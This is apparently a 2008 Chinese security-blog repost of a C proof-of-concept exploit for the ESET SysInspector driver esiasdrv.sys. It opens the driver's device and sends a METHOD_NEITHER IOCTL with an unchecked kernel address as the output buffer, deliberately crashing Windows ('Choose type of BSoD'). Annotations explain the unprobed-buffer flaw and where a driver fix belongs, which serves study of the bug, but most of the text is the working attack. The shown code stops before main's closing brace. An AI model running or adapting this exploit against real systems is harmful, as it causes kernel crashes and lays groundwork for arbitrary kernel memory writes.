• 2008-10-03

    ESET System Analyzer Tool - [网络攻防]

    版权声明:转载时请以超链接形式标明文章原始出处和作者信息及本声明
    http://3xp-0day.blogbus.com/logs/29864394.html

    #include <stdio.h>
    #include <stdlib.h>
    #include <windows.h>

    // Calling-convention wrappers for the ntdll exports declared further down.
    // __declspec(dllimport) means the binary has to be linked against ntdll.lib
    // (or have the imports resolved another way); windows.h itself does not
    // declare these Nt*/Rtl* routines.
    #define IMP_VOID __declspec(dllimport) VOID __stdcall
    #define IMP_SYSCALL __declspec(dllimport) NTSTATUS __stdcall

    // Object-manager / I/O-manager constants normally supplied by ntdef.h and
    // ntifs.h, reproduced here so the file builds with only windows.h.
    #define OBJ_CASE_INSENSITIVE 0x00000040 // OBJECT_ATTRIBUTES.Attributes: case-insensitive name lookup
    #define FILE_OPEN_IF 0x00000003         // NtCreateFile CreateDisposition: open, create if missing

    // Device-specific control code that main() sends to the driver. The low two
    // bits of an IOCTL encode the buffering method; here they are 3, i.e.
    // METHOD_NEITHER (the macro name misspells "NEITHER"). With that method the
    // I/O manager passes the caller's InputBuffer/OutputBuffer pointers to the
    // driver without validating them, so the driver itself must probe both
    // pointers (ProbeForRead/ProbeForWrite under a try/except) before use.
    #define IOCTL_METHOD_NEIGHTER 0x00223C1F
    // Byte length reported for both buffers; equals sizeof(ULONG), the type of
    // the InputBuffer variable in main().
    #define BUFFER_LENGTH 0x04

    // The SDK (ntdef.h / winternl.h) defines NTSTATUS as LONG, not ULONG. The
    // unsigned form does not change the plain non-zero "if (NtStatus)" checks
    // in main(), but an NT_SUCCESS()-style "Status >= 0" test would always be
    // true with this definition.
    typedef ULONG NTSTATUS;

    // Counted UTF-16 string as used by the native API (same field order as
    // ntdef.h). The /* 0xNN */ annotations are field offsets for a 32-bit
    // build; on 64-bit Buffer sits at offset 8 because of pointer alignment.
    typedef struct _UNICODE_STRING
    {
        /* 0x00 */ USHORT Length;        // bytes in Buffer, excluding any terminator
        /* 0x02 */ USHORT MaximumLength; // bytes available at Buffer
        /* 0x04 */ PWSTR Buffer;         // not required to be NUL-terminated
        /* 0x08 */
    }
        UNICODE_STRING,
      *PUNICODE_STRING,
    **PPUNICODE_STRING;

    // Name/attribute bundle handed to NtCreateFile. main() fills every field
    // explicitly and sets Length = sizeof(OBJECT_ATTRIBUTES), which the kernel
    // checks. Offsets shown are for a 32-bit build.
    typedef struct _OBJECT_ATTRIBUTES
    {
        /* 0x00 */ ULONG Length;                                   // must be sizeof(OBJECT_ATTRIBUTES)
        /* 0x04 */ HANDLE RootDirectory;                           // NULL/0 => ObjectName is an absolute NT path
        /* 0x08 */ PUNICODE_STRING ObjectName;                     // e.g. L"\\Device\\..." in main()
        /* 0x0C */ ULONG Attributes;                               // OBJ_* flags
        /* 0x10 */ PSECURITY_DESCRIPTOR SecurityDescriptor;        // unused here (NULL)
        /* 0x14 */ PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService; // unused here (NULL)
        /* 0x18 */
    }
        OBJECT_ATTRIBUTES,
      *POBJECT_ATTRIBUTES,
    **PPOBJECT_ATTRIBUTES;

    // Completion record written by the kernel for NtCreateFile and
    // NtDeviceIoControlFile. The anonymous union is an MSVC extension (standard
    // only since C11). Offsets shown are for a 32-bit build.
    typedef struct _IO_STATUS_BLOCK
    {
        union
        {
            /* 0x00 */ NTSTATUS Status;  // final status of the request
            /* 0x00 */ PVOID Pointer;    // reserved; overlays Status
        };

        /* 0x04 */ ULONG Information;    // request-specific (e.g. bytes transferred, create disposition)
        /* 0x08 */
    }
        IO_STATUS_BLOCK,
      *PIO_STATUS_BLOCK,
    **PPIO_STATUS_BLOCK;

    // Signature of the user-mode APC the kernel can queue on I/O completion.
    // Only needed to spell the NtDeviceIoControlFile prototype; main() passes
    // NULL for the routine, so it is never invoked in this program.
    typedef VOID (NTAPI *PIO_APC_ROUTINE)
    (
        IN PVOID ApcContext,
        IN PIO_STATUS_BLOCK IoStatusBlock,
        IN ULONG Reserved
    );

    /**
     * Initialise a UNICODE_STRING to point at an existing NUL-terminated
     * wide string. No copy is made; SourceString must outlive the
     * UNICODE_STRING (in main() it is a string literal, so this holds).
     */
    IMP_VOID RtlInitUnicodeString
    (
        IN OUT PUNICODE_STRING DestinationString,
        IN PCWSTR SourceString
    );

    /**
     * Open (or create) a file/device object by NT path.
     *
     * Whether an unprivileged caller can obtain the FILE_READ_DATA |
     * FILE_WRITE_DATA access that main() requests is decided entirely by the
     * security descriptor of the target device object: a driver that must only
     * serve administrators should create its device with a restrictive DACL
     * (IoCreateDeviceSecure / SDDL) rather than rely on IOCTL-level checks.
     *
     * @return NTSTATUS; zero (STATUS_SUCCESS) on success. The resulting handle
     *         is owned by the caller and released with NtClose.
     */
    IMP_SYSCALL NtCreateFile
    (
        OUT PHANDLE FileHandle,
        IN ACCESS_MASK DesiredAccess,
        IN POBJECT_ATTRIBUTES ObjectAttributes,
        OUT PIO_STATUS_BLOCK IoStatusBlock,
        IN PLARGE_INTEGER AllocationSize OPTIONAL,
        IN ULONG FileAttributes,
        IN ULONG ShareAccess,
        IN ULONG CreateDisposition,
        IN ULONG CreateOptions,
        IN PVOID EaBuffer OPTIONAL,
        IN ULONG EaLength
    );

    /**
     * Send an IOCTL to the device behind FileHandle.
     *
     * For METHOD_BUFFERED/METHOD_IN(OUT)_DIRECT codes the I/O manager copies or
     * probes and locks the buffers before the driver sees them. For
     * METHOD_NEITHER codes (the kind main() issues) InputBuffer and
     * OutputBuffer reach the driver as raw user-supplied virtual addresses with
     * no validation at all; a dispatch routine that dereferences them without
     * ProbeForRead/ProbeForWrite inside __try/__except lets any caller with a
     * handle read from or write to an arbitrary address, including kernel
     * memory, which is the defect this program demonstrates. The fix belongs in
     * the driver: probe both pointers and lengths, or switch the code to a
     * buffered method.
     *
     * @return NTSTATUS; zero on success.
     */
    IMP_SYSCALL NtDeviceIoControlFile
    (
        IN HANDLE FileHandle,
        IN HANDLE Event OPTIONAL,
        IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
        IN PVOID ApcContext OPTIONAL,
        OUT PIO_STATUS_BLOCK IoStatusBlock,
        IN ULONG IoControlCode,
        IN PVOID InputBuffer OPTIONAL,
        IN ULONG InputBufferLength,
        OUT PVOID OutputBuffer OPTIONAL,
        IN ULONG OutputBufferLength
    );

    /**
     * Sleep for the given interval. A negative Interval (as built in main()) is
     * relative, in 100-nanosecond units; a positive one is an absolute time.
     */
    IMP_SYSCALL NtDelayExecution
    (
        IN BOOLEAN Alertable,
        IN PLARGE_INTEGER Interval
    );

    /**
     * Close a handle obtained from NtCreateFile (or any other object handle).
     *
     * @return NTSTATUS; zero on success.
     */
    IMP_SYSCALL NtClose
    (
        IN HANDLE Handle
    );

    int __cdecl main(int argc, char **argv)
    {
        NTSTATUS NtStatus;
       
        HANDLE DeviceHandle;
        ULONG InputBuffer;

        UNICODE_STRING DeviceName;
        OBJECT_ATTRIBUTES ObjectAttributes;
        IO_STATUS_BLOCK IoStatusBlock;
        LARGE_INTEGER Interval;
       
        ///////////////////////////////////////////////////////////////////////////////////////////////
       
        system("cls");
       
        printf( " +----------------------------------------------------------------------------+\n"
                " |                                                                            |\n"
                " | ESET, LLC. - http://www.eset.com/                                          |\n"
                " |                                                                            |\n"
                " | Affected Software:                                                         |\n"
                " | ESET System Analyzer Tool - 1.1.1.0                                        |\n"
                " |                                                                            |\n"
                " | Affected Driver:                                                           |\n"
                " | Eset SysInspector AntiStealth driver - 3.0.65535.0 - esiasdrv.sys          |\n"
                " | Proof of Concept Exploit                                                   |\n"
                " |                                                                            |\n"
                " +----------------------------------------------------------------------------+\n"
                " |                                                                            |\n"
                " | NT Internals - http://www.ntinternals.org/                                 |\n"
                " | alex ntinternals org                                                       |\n"
                " | 01 October 2008                                                            |\n"
                " |                                                                            |\n"
                " +----------------------------------------------------------------------------+\n\n");
       
        ///////////////////////////////////////////////////////////////////////////////////////////////
       
        RtlInitUnicodeString(&DeviceName, L"\\Device\\esiasdrv");

        ObjectAttributes.Length = sizeof(OBJECT_ATTRIBUTES);
        ObjectAttributes.RootDirectory = 0;
        ObjectAttributes.ObjectName = &DeviceName;
        ObjectAttributes.Attributes = OBJ_CASE_INSENSITIVE;
        ObjectAttributes.SecurityDescriptor = NULL;
        ObjectAttributes.SecurityQualityOfService = NULL;

      
        NtStatus = NtCreateFile(
                                &DeviceHandle,                      // FileHandle
                                FILE_READ_DATA | FILE_WRITE_DATA,   // DesiredAccess
                                &ObjectAttributes,                  // ObjectAttributes
                                &IoStatusBlock,                     // IoStatusBlock
                                NULL,                               // AllocationSize OPTIONAL
                                0,                                  // FileAttributes
                                FILE_SHARE_READ | FILE_SHARE_WRITE, // ShareAccess
                                FILE_OPEN_IF,                       // CreateDisposition
                                0,                                  // CreateOptions
                                NULL,                               // EaBuffer OPTIONAL
                                0);                                 // EaLength

        /*
        if(NtStatus)
        {
            printf(" [*] NtStatus of NtCreateFile - 0x%.8X\n", NtStatus);   
            return NtStatus;
        }
        */
       
        Interval.LowPart = 0xFF676980;
        Interval.HighPart = 0xFFFFFFFF;

        printf("\n 3");
        NtDelayExecution(FALSE, &Interval);
       
        printf(" 2");
        NtDelayExecution(FALSE, &Interval);

        printf(" 1");
        NtDelayExecution(FALSE, &Interval);

        printf(" Upss\n\n");
        NtDelayExecution(FALSE, &Interval);


        //
        // Choose type of BSoD
        //

        // InputBuffer = 0x12345678;
       
        InputBuffer = 0;


        NtStatus = NtDeviceIoControlFile(
                                        DeviceHandle,          // FileHandle
                                        NULL,                  // Event
                                        NULL,                  // ApcRoutine
                                        NULL,                  // ApcContext
                                        &IoStatusBlock,        // IoStatusBlock
                                        IOCTL_METHOD_NEIGHTER, // FsControlCode
                                        &InputBuffer,          // InputBuffer
                                        BUFFER_LENGTH,         // InputBufferLength
                                        (PVOID)0x80000000,     // OutputBuffer
                                        BUFFER_LENGTH);        // OutBufferLength
       
        if(NtStatus)
        {
            printf(" [*] NtStatus of NtDeviceIoControlFile - 0x%.8X\n", NtStatus);
            return NtStatus;
        }
       
        NtStatus = NtClose(DeviceHandle); // Handle
       
        if(NtStatus)
        {
            printf(" [*] NtStatus of NtClose - 0x%.8X\n", NtStatus);   
            return NtStatus;
        }

        return FALSE;




